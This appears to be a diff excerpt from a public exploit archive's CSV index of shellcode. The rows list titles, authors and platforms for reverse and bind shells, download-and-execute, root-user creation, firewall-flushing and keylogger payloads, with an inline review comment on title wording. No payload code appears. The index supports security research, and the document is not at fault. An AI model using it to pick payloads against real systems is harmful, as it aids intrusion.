39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40245,shellcodes/windows_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43602,shellcodes/linux_x86-64/43602.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43603,shellcodes/linux_x86-64/43603.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43604,shellcodes/linux_x86-64/43604.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43605,shellcodes/linux_x86-64/43605.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
41381,shellcodes/windows_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
41467,shellcodes/windows_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43507,shellcodes/freebsd_x86/43507.c,"FreeBSD - reboot() Shellcode (15 Bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix
43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix
43510,shellcodes/irix/43510.c,"IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
43510,shellcodes/irix/43510.c,"IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix
43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
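Review bot: The rewritten title on the second 40061 row (apparently the new side; the +/- column is not visible here) still reads `Persistant`, while the rewritten 40122 row a few lines below spells it `Persistent`, so a keyword search of the index for one spelling misses the other entry; `+ Persistent +` would make the two agree. The conversion to the `Bind TCP (port) ... Shell` / `Reverse TCP (addr:port) ... Shell` order also looks incomplete in this hunk: rows 40179, 41509 and 41510 keep the older `Bind Netcat Shell (...)` / `Reverse Netcat Shell (...)` wording although 39901 was converted. Separately, the path `shellcodes/linux_x86-64/41510.nsam` differs from the `.nasm` extension on the neighbouring 41498–41509 rows; if the file on disk really has that name the row is consistent, but anything that filters the index by extension will skip it.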
@ -646,45 +664,52 @@ id,file,description,date,author,type,platform
43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm
43536,shellcodes/arm/43536.c,"Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm
43536,shellcodes/arm/43536.c,"Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm
43537,shellcodes/arm/43537.c,"Linux/StrongARM - setuid() Shellcode (20 bytes)",2009-01-01,funkysh,shellcode,arm
43538,shellcodes/arm/43538.c,"Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)",2009-01-01,funkysh,shellcode,arm
43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm
43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm
43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc
43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
